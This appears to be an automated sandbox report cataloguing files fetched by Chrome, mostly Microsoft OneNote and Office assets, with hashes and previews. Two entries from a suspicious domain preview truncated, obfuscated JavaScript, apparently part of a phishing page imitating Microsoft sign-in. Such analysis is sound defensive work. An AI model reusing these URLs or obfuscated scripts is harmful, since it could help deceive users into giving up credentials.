                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/wp5/uiFabricLazy.min.js
                                                                                      Preview:"use strict";(globalThis.onenoteOnlineChunks=globalThis.onenoteOnlineChunks||[]).push([[288],{16790:function(e,n,t){t.r(n),t.d(n,{Callout:function(){return i}});var o=t(14605),r=t(21598),a=t(19324),u=t(20546),i=r.forwardRef((function(e,n){var t=e.layerProps,i=e.doNotLayer,l=(0,o.__rest)(e,["layerProps","doNotLayer"]),s=r.createElement(a.s,(0,o.__assign)({},l,{doNotLayer:i,ref:n}));return i?s:r.createElement(u.W,(0,o.__assign)({},t),s)}));i.displayName="Callout"},90032:function(e,n,t){t.r(n),t.d(n,{ContextualMenu:function(){return p}});var o=t(14605),r=t(21598),a=t(15417),u=t(60669),i=t(72513),l=t(21564),s=t(98371),d={root:"ms-ContextualMenu",container:"ms-ContextualMenu-container",list:"ms-ContextualMenu-list",header:"ms-ContextualMenu-header",title:"ms-ContextualMenu-title",isopen:"is-open"};function c(e){return r.createElement(m,(0,o.__assign)({},e))}var m=(0,a.I)(i.wb,(function(e){var n=e.className,t=e.theme,o=(0,l.Km)(d,t),r=t.fonts,a=t.semanticColors,u=t.effects;return{root:[t.fon
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):27
                                                                                      Entropy (8bit):3.708048150071232
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:435B48C70ACA2DC80F8B34B5FDEB2789
                                                                                      SHA1:FFE2C8567607568F939FA1A6F9888639B98B400C
                                                                                      SHA-256:6468AC9F9BCA964F3910FC967B80781C1C8634300E36F95AE49056D91A2734BF
                                                                                      SHA-512:5C73531F908067B986F4F7F1BB423DC6FC4B1CDC9A6C65205658BD2A2499CB53F0F1C4EB928B8B87B189D969C3769F9D97EA5AB1CEA97FE6F18D2DD4AD583C60
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:The service is unavailable.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65530), with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):125478
                                                                                      Entropy (8bit):5.3045293235159106
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A79F48E6E75920EAC571FFBAEDAD667A
                                                                                      SHA1:1058C1417B1C18C127EE477CF250A2BBD2D7C211
                                                                                      SHA-256:C34867173151FBA54D6453846BE6B4028397018A76D7ECB70CF38A0AFDA072DF
                                                                                      SHA-512:9ABEFFC4F43ED1588212F9DDC0ADD4B99A1BEB7D19195F7926376056E219C2788B2C554DAFDE92C54200236350DF213AD68890418EEAF5CE56101BFC4E9ED6AB
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:(function(){function getAugmentedNamespace(e){if(e.__esModule)return e;var t=e.default;if("function"==typeof t){var r=function e(){if(this instanceof e){var r=[null];return r.push.apply(r,arguments),new(Function.bind.apply(t,r))}return t.apply(this,arguments)};r.prototype=t.prototype}else r={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.keys(e).forEach((function(t){var n=Object.getOwnPropertyDescriptor(e,t);Object.defineProperty(r,t,n.get?n:{enumerable:!0,get:function(){return e[t]}})})),r}var lib={},extendStatics=function(e,t){return extendStatics=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var r in t)Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r])},extendStatics(e,t)};function __extends(e,t){if("function"!=typeof t&&null!==t)throw new TypeError("Class extends value "+String(t)+" is not a constructor or null");function r(){this.constructor=e}extendStatics(e,t),e.prototype=null===t?Object.create(t):(r.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Web Open Font Format, TrueType, length 3052, version 4.-22282
                                                                                      Category:downloaded
                                                                                      Size (bytes):3052
                                                                                      Entropy (8bit):7.719621094274623
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A11193DEB0B6BA33E4782396F19F3D0C
                                                                                      SHA1:6200BCA8CB8A8C7B8C2AA7E8665E464ED5D15194
                                                                                      SHA-256:FE05188DA3C5A767088355C5FB1229BA979AEDC8727AD8FCF9C170267C52B786
                                                                                      SHA-512:38BB35A8A47FC8FD6C42ABF812F81453ED0C73EDA82695F0DDB9324EC06A68CBE07DE05BC1A95E9289ABE75AF34A463EBB36040F731A4375FE4E6D9A359D4FC2
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/hFE05188DA3C5A767_App_Scripts/fonts/sharedheaderplaceholder-icons.woff
                                                                                      Preview:wOFF........................................OS/2...D...H...`1Y{.cmap.......N...r....cvt ....... ...*....fpgm...........Y...gasp................glyf............@.-.head.......2...6.P.@hhea...........$....hmtx................loca... .........F..maxp...4....... .&..name...T...........Upost...L....... .Q..prep...`........x...x.c`a_.8.....u..1...4.f...$..........@ ...........<...!$.X.........~..x.c```f.`..F.......|... -..@.......<.~^......1E$.I<.8'.A.Sl..:.4...)6......(..x.c.b.e(`h`X.......x............x.]..N.@..s$..'@:!.u*C....K$.%%...J.......n..b.........|.s...|v..G*)V.7........!O.6eaL.yV.e.j..kN..M.h....Lm....-b....p.N.m.v.....U<..#...O.}.K..,V..&...^...L.c.x.....?ug..l9e..Ns.D....D...K........m..A.M....a.....g.P..`....d.............x..TMh.G.~ogWk..X^.k+.F....*...=.......'....l$..P..MV..v.E.?....@..9$=..S..!...%&`.s(u......].^..f.....f..X.`?.....@qx.~..F..7...Q..n.~.M.}X.....A..`...@g..isq.o...t.|.....)@.....c~..+.....-B..D....E....B...|.}.6>.....y..].6....
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (4615)
                                                                                      Category:dropped
                                                                                      Size (bytes):4647
                                                                                      Entropy (8bit):5.170191496530107
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:20B673F9D2064C78B2CC2C7A7DDBC46D
                                                                                      SHA1:3CC9E0F095D93B38481BE3D0137741D97C1978C3
                                                                                      SHA-256:83C5CCAF7404DF012ACED39092D0982EB73E9DC942BCE6991956C7B2F10957D8
                                                                                      SHA-512:8BA3EE568430AA6E15599BE2C9EBDC31BBF4DD8AB7A4EB5E91A01BBCCBFDC0B5FE0845E00CAE6CB35ED455D44DCB8640F98F352628DBAD822CCEB6F6EA86DEFA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[13],{130:(e,t,n)=>{function a(){for(var e=[],t=0;t<arguments.length;t++)e[t]=arguments[t];i()&&console.log.apply(console,e)}function i(){try{if("sessionStorage"in window&&window.sessionStorage){var e=window.sessionStorage.enableFCILogging;return e&&"true"===e.toLowerCase()&&"undefined"!=typeof console&&!!console}}catch(e){}return!1}n.r(t),n.d(t,{getFirstCPUIdle:()=>o});var r=function(){function e(e){this._longTaskId=0,this._checkFCIRunId=0,this._isDisposed=!1;var t=e.requiredMainThreadCPUIdleDurationInMilliseconds,n=e.measurementStartTime;this._measureName=e.measureName||"FCI",this._measurementStartTime=n,this._requiredMainThreadCPUIdleDurationInMilliseconds=t,this._resultResolver={resolve:void 0,reject:void 0},this._fciPromise=void 0,this._longTasks=[],this._processLongTaskPreQueue(e.initialEntries),this._registerLongTaskObserver()}return e.prototype.measureFCI=function(){var e=this;if(this._isDisposed)throw
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 1920 x 1080, 8-bit/color RGB, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):214581
                                                                                      Entropy (8bit):7.989476951155978
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:73E4A57308882BB368A1E2F49E58497F
                                                                                      SHA1:99CEF0948C0A6114982E66D28AD311CA95D6F09C
                                                                                      SHA-256:759C1FA1BBE8316C91FE672EE390CA824622A3CB5D4F6FE74B996677B6417D9C
                                                                                      SHA-512:2B2912E924EDC40BFFA1B4B722320B7C4F38A51DF4F11B3A20782857AA9EFCD2FD8D6B82A2D7F20A68BBB496A9A232AA31F707D91DC411868C674CB18BF83904
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://aadcdn.msauthimages.net/dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663
                                                                                      Preview:.PNG........IHDR.......8.....g.V.....pHYs...#...#.x.?v..E.IDATx..........;..Gu........k......[.>r.I.....H.,l,..M`S:.:.o....."...HX......YR?.....A>W......6..w...N..Hi......~..L...i*..v.2.J../V..6......g.i.v.....o...w.8.Et..3.q.....F.sm..\.t.....5...k.M...Q....f...-...p.:.=...K..%.]...C..9t.Q..v.....|=....M..O..~.GL.X.~]4.(O_......Q...6.&.E;..b`._.o..U....UO....yZ...@o.<^csD7}.......m`l.......Z..9cc.O&aLO.......G..&......N.j.s.).....:...q...V7.w,..;...fLJ....m..'.]....J.D..i.t.B...@o.<^Q.Y.,+.@....9..x..6.NBp.9.b........Z......q.I..k...[.............;..U.n.....Gy..C..[z..V&...O...;.:...z......x.y.g...O.s..Fa.*.......7...J......k........TsT.3..[...#.u........D...A.....*mn.......S.C...7}..M.g.2..p.g.h.s...!..?..../..C..^.G../..[H.b...o.l.un...1.H#J.3.^...y.N...B.:..m.....6.~.6.....~z....:...z......:s..|..b...Y...2.._+*... ..ah....y..K)`M6z..n.?...;.[...H.......).T.1..b.5s.kW.za..A.u.C.a.h.h'=jXzV.Q../.@o.<X.>..b................wn<c....&R
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Web Open Font Format, TrueType, length 151924, version 0.0
                                                                                      Category:downloaded
                                                                                      Size (bytes):151924
                                                                                      Entropy (8bit):7.996755078799659
                                                                                      Encrypted:true
                                                                                      SSDEEP:
                                                                                      MD5:E80FF72E03E780056CFDBD85C63404CE
                                                                                      SHA1:C450A1A6233F0FBC6DBFFB7FEE251E378F64EF32
                                                                                      SHA-256:05828D625DCB5781D0A3CC67A2429CED535FDF848B8B8075D49751EB5B30C7AF
                                                                                      SHA-512:D819D75CA896AF15F99185F87AF40A85A0FA6941B9E08974C6569123B601DCC8E043BE1C0F5C154E37A351A046B57D5196002B16FA7102761E3C0961D92CAC8D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://spoprod-a.akamaihd.net/files/fabric/assets/icons/fabricmdl2icons.woff
                                                                                      Preview:wOFF......Qt................................OS/2...X...H...`JZ}.VDMX.............^.qcmap................cvt ...\... ...*....fpgm...|.......Y...gasp...l............glyf...x..$...0.{.yyhead..7`...6...6%.d.hhea..7........$7.5.hmtx..7....M... .N..loca..<....q...D...maxp..K|... ... .|..name..K....8.......post..P........ .Q.wprep..P.........x...x.c`.`a......:....Q.B3_dHc..`e.bdb... .`@..`......os9.|...V...)00......x...S......._..m.m.m.m.m;e..y.~.......<p..a.0t.&...a.pa.0B.1..F...Q.ha.0F.3.....q.xa.0A.0L.&...I.da.0E.2L....i.ta.0C.1..f...Y.la.0G.3.....y.|a..@X0,.....E.ba.DX2,....e.ra..BX1..V...U.ja..FX3.....u.za..A.0l.6...M.fa.E.2l....m.va..C.1..v...].na..G.3......}.~a.p@80......C.a..pD82.....c.q..pB81..N...S.i..pF83.....s.y..pA.0\.....K.e..pE.2\....k.u..pC.1..n...[.m..pG.3......{.}...@x0<.....G.c...Dx2<....g.s...Bx1..^...W.k...Fx3.....w.{...A.0|.>...O.g...E.2|....o.w...C.1..~..._.o..08........?..0$........x...wx.....;..j..fwf....R. %.....4......"<.w..A.<..H.C'.E.E..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 82 x 258, 8-bit/color RGBA, non-interlaced
                                                                                      Category:downloaded
                                                                                      Size (bytes):6140
                                                                                      Entropy (8bit):7.86318803852975
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:2443F04DFD8CE58264835F7CD477799C
                                                                                      SHA1:E798EF676A42AA8F723246C95FA6A918010223B2
                                                                                      SHA-256:77DD1463FE34BE51528C6535C5AAF5590EE90BBD3B76AE8E362657C45E9F90FD
                                                                                      SHA-512:2668E7EEFF653ECDEF04058FDC43328A80F297EE601839737F35A860737DAD438B03298C1A452E83DAED31DDDA540F7F065FE8F22FB05FC150A9FEAB08FFC91D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_resources/1033/moe_status_icons.png
                                                                                      Preview:.PNG........IHDR...R.........m......tEXtSoftware.Adobe ImageReadyq.e<...fiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c061 64.140949, 2010/12/07-10:57:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:C714FB70438BE1119DF2F8ED1CCAF400" xmpMM:DocumentID="xmp.did:98155F5CD83911E1ACDEFDB8BE9BCEAA" xmpMM:InstanceID="xmp.iid:98155F5BD83911E1ACDEFDB8BE9BCEAA" xmp:CreatorTool="Adobe Photoshop CS5.1 Windows"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:09F73A8D39D8E111AE39EC2BD256A3F2" stRef:documentID="xmp.did:C714FB70438BE1119DF2F8ED1CCAF400"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Y.[...,IDATx..........{....a.... .<c......3.....
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):123
                                                                                      Entropy (8bit):4.739264532220853
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:110868F9EC11E396D97ED9289064D046
                                                                                      SHA1:3E5FF538A088C9D06F1ADC9F0E82E30FB9D6E3A1
                                                                                      SHA-256:C1DC3E248A3C0494BBF760B8E2A6B3E38A3507043FCC4CCBEB533B90EAE45F50
                                                                                      SHA-512:01A891D5B8C14BF7845F4AE51A01AD34F68F9583A4EEA4C07AC265FAA06BD5D6B01DB18F54A3DFCD11A4BFAAA33114264CE650567D65E6A1554E81E00001E377
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://oauth.officeapps.live.com/oa/OAuth.html
                                                                                      Preview:<html xmlns="http://www.w3.org/1999/xhtml" >.. <head>.. <meta charset="UTF-8">.. </head>.. <body>.. </body>..</html>
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (6620), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):6620
                                                                                      Entropy (8bit):5.331799891934791
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:570CA8828BF44260F82D8821D04997D9
                                                                                      SHA1:A760059FFD51D0D71BBC47083ADFAED5E4B9366D
                                                                                      SHA-256:BBEF62C43DB44E91F7D7C5B7C5DF62084B437DAD604DDAB36DFE563DFE271B79
                                                                                      SHA-512:868A8972FC5BA6E42536E311D4D67E7EFA22F0E58A4F33E524530C27C42FA031C7FD61AB78354F3B04B78856742948625DA112EFE1CA11E8C04E340544E24139
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/js_/671a394a1ba96-069e1219415fe70482935df3ce64b451
                                                                                      Preview:const a0_0x3073bc=a0_0x3920;(function(_0x286f0d,_0x4566b6){const _0x46dd23=a0_0x3920,_0x1f2b9f=_0x286f0d();while(!![]){try{const _0x4d2b84=parseInt(_0x46dd23(0xaa))/0x1+-parseInt(_0x46dd23(0xd1))/0x2*(parseInt(_0x46dd23(0xc8))/0x3)+parseInt(_0x46dd23(0xde))/0x4+-parseInt(_0x46dd23(0xdc))/0x5*(parseInt(_0x46dd23(0xcb))/0x6)+parseInt(_0x46dd23(0xa6))/0x7+parseInt(_0x46dd23(0xa8))/0x8*(parseInt(_0x46dd23(0xdf))/0x9)+-parseInt(_0x46dd23(0xad))/0xa*(-parseInt(_0x46dd23(0xa0))/0xb);if(_0x4d2b84===_0x4566b6)break;else _0x1f2b9f['push'](_0x1f2b9f['shift']());}catch(_0x1e41c7){_0x1f2b9f['push'](_0x1f2b9f['shift']());}}}(a0_0x1fe5,0x8390c));const a0_0x27d11f=(function(){let _0x107221=!![];return function(_0x3578cf,_0xbd6423){const _0x844201=_0x107221?function(){const _0x466070=a0_0x3920;if(_0xbd6423){const _0x216aad=_0xbd6423[_0x466070(0xdb)](_0x3578cf,arguments);return _0xbd6423=null,_0x216aad;}}:function(){};return _0x107221=![],_0x844201;};}()),a0_0x51f25c=a0_0x27d11f(this,function(){const _0
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):56
                                                                                      Entropy (8bit):4.677279698572885
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:DA69159E7EC38222D30F02FAE3F5B795
                                                                                      SHA1:A25E1C206C6EF0DC1E82AB5D715E56A1EFE3BDE4
                                                                                      SHA-256:77E2C43DFDEBA7EA496189A7D4DA3A22EDA4CCE35B6246260698A60B141972EE
                                                                                      SHA-512:C08E416F8F47F95A258951568995689805AEFDD04A95AB52E8FDA790441BD3A1FC76209885F81132772AA6ED41E216DFE541AE0151975481DA3D190246D0FA29
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwkvQ2-lAXZCYxIFDdjY4LISBQ11LGDrEhcJurgal7crdicSBQ3Y2OCyEgUNdSxg6w==?alt=proto
                                                                                      Preview:ChIKBw3Y2OCyGgAKBw11LGDrGgAKEgoHDdjY4LIaAAoHDXUsYOsaAA==
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (6068), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):6068
                                                                                      Entropy (8bit):5.2957993130663965
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:A151A153E9EABEC2F8254BDFEBDD913B
                                                                                      SHA1:D2FD38AD14E8DF1BC70292D92E06DA6F287F64F8
                                                                                      SHA-256:CAF6E98D6E3DA1C2AA7AE184E0D0ADB65B3CEA05C59D1CAF13134FC5FF08A144
                                                                                      SHA-512:D658F12844D558C1E229CD5C1CC7C67F3183806DA7153409F1DA25E804281470E7DE4C06BAC803B2C8E7CAB54860D19D35CBF00503BE5A51A754F90C0D0987D7
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://mohrhydrokultur.adaradocumentfolder.top/js2_/671a3964cb686-18422c97909c69491844ce8ab555f730
                                                                                      Preview:const a0_0x2a5fe5=a0_0x46e1;(function(_0x32bc40,_0xe0232c){const _0x2b1141=a0_0x46e1,_0x5d3f16=_0x32bc40();while(!![]){try{const _0x13957f=-parseInt(_0x2b1141(0x1e4))/0x1*(-parseInt(_0x2b1141(0x1db))/0x2)+-parseInt(_0x2b1141(0x1ba))/0x3+parseInt(_0x2b1141(0x1e6))/0x4+-parseInt(_0x2b1141(0x1c6))/0x5*(-parseInt(_0x2b1141(0x1d7))/0x6)+-parseInt(_0x2b1141(0x1eb))/0x7*(-parseInt(_0x2b1141(0x1b2))/0x8)+-parseInt(_0x2b1141(0x1e9))/0x9+parseInt(_0x2b1141(0x1d9))/0xa*(-parseInt(_0x2b1141(0x1e3))/0xb);if(_0x13957f===_0xe0232c)break;else _0x5d3f16['push'](_0x5d3f16['shift']());}catch(_0x3d1910){_0x5d3f16['push'](_0x5d3f16['shift']());}}}(a0_0x34d2,0xbe2c5));const a0_0x4e4e6e=(function(){let _0x12f22d=!![];return function(_0x5966f7,_0x2acf17){const _0x44136f=_0x12f22d?function(){if(_0x2acf17){const _0x4aa564=_0x2acf17['apply'](_0x5966f7,arguments);return _0x2acf17=null,_0x4aa564;}}:function(){};return _0x12f22d=![],_0x44136f;};}()),a0_0x2d1428=a0_0x4e4e6e(this,function(){const _0x4ed980=a0_0x46e1;
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                      Category:dropped
                                                                                      Size (bytes):3651
                                                                                      Entropy (8bit):4.094801914706141
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:EE5C8D9FB6248C938FD0DC19370E90BD
                                                                                      SHA1:D01A22720918B781338B5BBF9202B241A5F99EE4
                                                                                      SHA-256:04D29248EE3A13A074518C93A18D6EFC491BF1F298F9B87FC989A6AE4B9FAD7A
                                                                                      SHA-512:C77215B729D0E60C97F075998E88775CD0F813B4D094DC2FDD13E5711D16F4E5993D4521D0FBD5BF7150B0DBE253D88B1B1FF60901F053113C5D7C1919852D58
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):36058
                                                                                      Entropy (8bit):4.829020472925349
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:3A60051CD6CA060A515E1ED573152E25
                                                                                      SHA1:7B9CC35159DEE664492531F4A94C089348095528
                                                                                      SHA-256:864D10FD5CAB9FFFA8F4FE32CB525809D3A7F195B4CE0CA72B01FE01F24659C2
                                                                                      SHA-512:0FF4E606F7FD0EF3B8D278E5D1CF344EA812F8297C8E9FFA3DDBFEE4D3665D3A589B915111B676280D7A6C00BB7A0980240DBBC91C8FB6EE13875334D7EE7281
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:{"dashboard":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/dashboard.en.bundle.js"},"version":"2024.10.17.2"},"groups":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/groups.en.bundle.js"},"version":"2024.10.17.2"},"app-mgmt":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/app-mgmt.en.bundle.js"},"version":"2024.10.17.2"},"esign":{"cdnUrl":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/","loaderSpec":{"type":"scriptUrl","content":"https://res.cdn.office.net/admincenter/admin-main/2024.10.17.2/esign.en.bundle.js"},"version":"2024.10.17.2"},"viva-goals-organization-views"
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):11
                                                                                      Entropy (8bit):3.2776134368191165
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:825644F747BAAB2C00E420DBBC39E4B3
                                                                                      SHA1:10588307553E766AB3C7D328D948DC6754893CEF
                                                                                      SHA-256:7C41B898C5DA0CFA4AA049B65EF50248BCE9A72D24BEF4C723786431921B75AA
                                                                                      SHA-512:BFE6E8DF36C78CBFD17BA9270C86860EE9B051B82594FB8F34A0ADF6A14E1596D2A9DCDC7EB6857101E1502AFF6FF515A36E8BA6C80DA327BC11831624A5DAEA
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview:Bad Request
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (2936)
                                                                                      Category:downloaded
                                                                                      Size (bytes):2985
                                                                                      Entropy (8bit):5.4388922463314096
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:4F1D12D57F5342C2B9B0ED43E73C39B8
                                                                                      SHA1:C0C2E9B165076D27558A37C55B1E14CE9728FCEF
                                                                                      SHA-256:5B1487ECD05FC0A7192742055E471EE39845AD39D20CFF2EF746FE5B62C5CB3C
                                                                                      SHA-512:23AF0E4923B21072B18BD03852D79191413B2B01BC28F14D0FA06C946CA077F20E5788E33DFC580BA6DD5796D1020ADC796AE124B455AB03E1CADAC38E73B580
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://c1-onenote-15.cdn.office.net/o/s/161821441004_App_Scripts/wp5/oreonotebookpane.min.js
                                                                                      Preview:(globalThis.onenoteOnlineChunks=globalThis.onenoteOnlineChunks||[]).push([[977],{27141:function(e,t,n){var o=n(27113),a=n(7954)(o);a.push([e.id,".wacCanvasOverlay__overlay___DpHwX {\n bottom: 0;\n left: -50px;\n position: absolute;\n right: 0;\n top: 0;\n z-index: 90;\n background: rgba(0, 0, 0, 0);\n -ms-high-contrast-adjust: none;\n}\n",""]),a.locals={overlay:"wacCanvasOverlay__overlay___DpHwX"},e.exports=a},4739:function(e,t,n){"use strict";var o=n(19857),a=n(21598),s=n(80700);const l=n(72919),r=(0,o.connect)((e=>({showOverlay:e.isVisible,navSelection:e.navSelection})))((e=>{const t=e.showOverlay&&!e.navSelection[s.C.SHOW_ALL]?a.createElement("div",{className:l.overlay}):null;return a.createElement("div",null,t)}));var c=n(49681),i=n(11289),d=n(11834),m=n(14435),u=n(4600),A=n(61358);let y=(0,i.I)();const S=(e,t)=>{let n={};return n[t]=!0,e((0,m.QI)(n)),c.Ay.ActionResponse.Succeeded};var v=n(49884),g=n(34632),h=n(63365),p=n(84768);const C=n(340);if(b=A.A.dispatch,c.Ay.Registe
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (20082), with no line terminators
                                                                                      Category:downloaded
                                                                                      Size (bytes):20082
                                                                                      Entropy (8bit):5.3785189328644485
                                                                                      Encrypted:false
                                                                                      SSDEEP:
                                                                                      MD5:58A30E58FBE0165292F0425B04256E46
                                                                                      SHA1:420050FE7E6034D52094B2F769FDB12A3591A748
                                                                                      SHA-256:534ECF698946529FF99C868DA810DAB8E1E9C7491EBDC873BDF95D34ABF75C4E
                                                                                      SHA-512:6127E32FC185C33353C75180F2B54DFE28E471558FF2478B23C8AB64511BFBAC0AA6200740F94186F0CC56F5D6137C9BD7F16BA3580F4E994A064B7E5AE67D44
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      URL:https://cdn.onenote.net/officeaddins/161821840453_Scripts/LearningTools/LearningTools.js
